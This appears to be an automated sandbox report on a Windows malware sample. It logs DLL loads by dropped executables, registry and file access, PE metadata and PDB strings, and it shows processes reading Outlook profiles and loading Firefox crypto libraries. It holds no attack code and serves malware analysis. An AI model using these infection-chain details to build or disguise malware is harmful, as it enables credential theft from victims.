Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textshaping.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textinputframework.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wlidsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gamestreamingext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msauserext.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: tbs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptnet.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptngc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptprov.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elscore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: elstrans.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Section loaded: kernel.appcore.dll

Source: C:\Users\user\Desktop\1Vkf7silOj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: 1Vkf7silOj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: C:\Users\user\AppData\Local\Temp\1000020001\1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: 1Vkf7silOj.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 1Vkf7silOj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mozglue.pdbP source: aspnet_regiis.exe, 00000036.00000002.2158377669.000000006BBCD000.00000002.00000001.01000000.00000022.sdmp, mozglue[1].dll.54.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.54.dr, freebl3.dll.54.dr
Source:	Binary string: wextract.pdb source: Installer.exe, 00000015.00000002.1923288884.00007FF6D02F9000.00000002.00000001.01000000.00000015.sdmp, Installer.exe, 00000015.00000000.1732577971.00007FF6D02F9000.00000002.00000001.01000000.00000015.sdmp, Installer[1].exe.10.dr
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdb source: svhosts.exe, 00000029.00000002.3916966194.0000000005F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.54.dr, freebl3.dll.54.dr
Source:	Binary string: nss3.pdb@ source: aspnet_regiis.exe, 00000036.00000002.2160559519.000000006CDFF000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: wextract.pdbGCTL source: Installer.exe, 00000015.00000002.1923288884.00007FF6D02F9000.00000002.00000001.01000000.00000015.sdmp, Installer.exe, 00000015.00000000.1732577971.00007FF6D02F9000.00000002.00000001.01000000.00000015.sdmp, Installer[1].exe.10.dr
Source:	Binary string: C:\Users\Anton\Desktop\UnionFiles\UnionFiles\obj\Debug\union.pdb9 source: alex5555555.exe, 00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp, RegAsm.exe, 00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbO source: svhosts.exe, 00000029.00000002.3916966194.0000000005F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdb source: O3B6wY7ZkFhh.exe, 00000031.00000003.2096843512.0000027E7E510000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000002.2105790979.000000C0001A3000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000003.2097093034.0000027E7E4D0000.00000004.00001000.00020000.00000000.sdmp, O3B6wY7ZkFhh.exe, 00000031.00000002.2101844018.000000C00009E000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb~ source: svhosts.exe, 00000029.00000002.3916966194.0000000005F99000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.ServiceModel.pdb source: RegAsm.exe, 0000000D.00000002.3790980158.00000000008F7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140[1].dll.54.dr, vcruntime140.dll.54.dr
Source:	Binary string: C:\Users\Anton\Desktop\UnionFiles\UnionFiles\obj\Debug\union.pdb source: alex5555555.exe, 00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp, RegAsm.exe, 00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb source: RegAsm.exe, 0000000D.00000002.3915719731.0000000005F25000.00000004.00000020.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3924492126.0000000006BE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: aspnet_regiis.exe, 00000036.00000002.2160559519.000000006CDFF000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: RegAsm.exe, 0000000D.00000002.3791536880.0000000000995000.00000004.00000020.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3804687281.00000000010C2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: aspnet_regiis.exe, 00000036.00000002.2158377669.000000006BBCD000.00000002.00000001.01000000.00000022.sdmp, mozglue[1].dll.54.dr
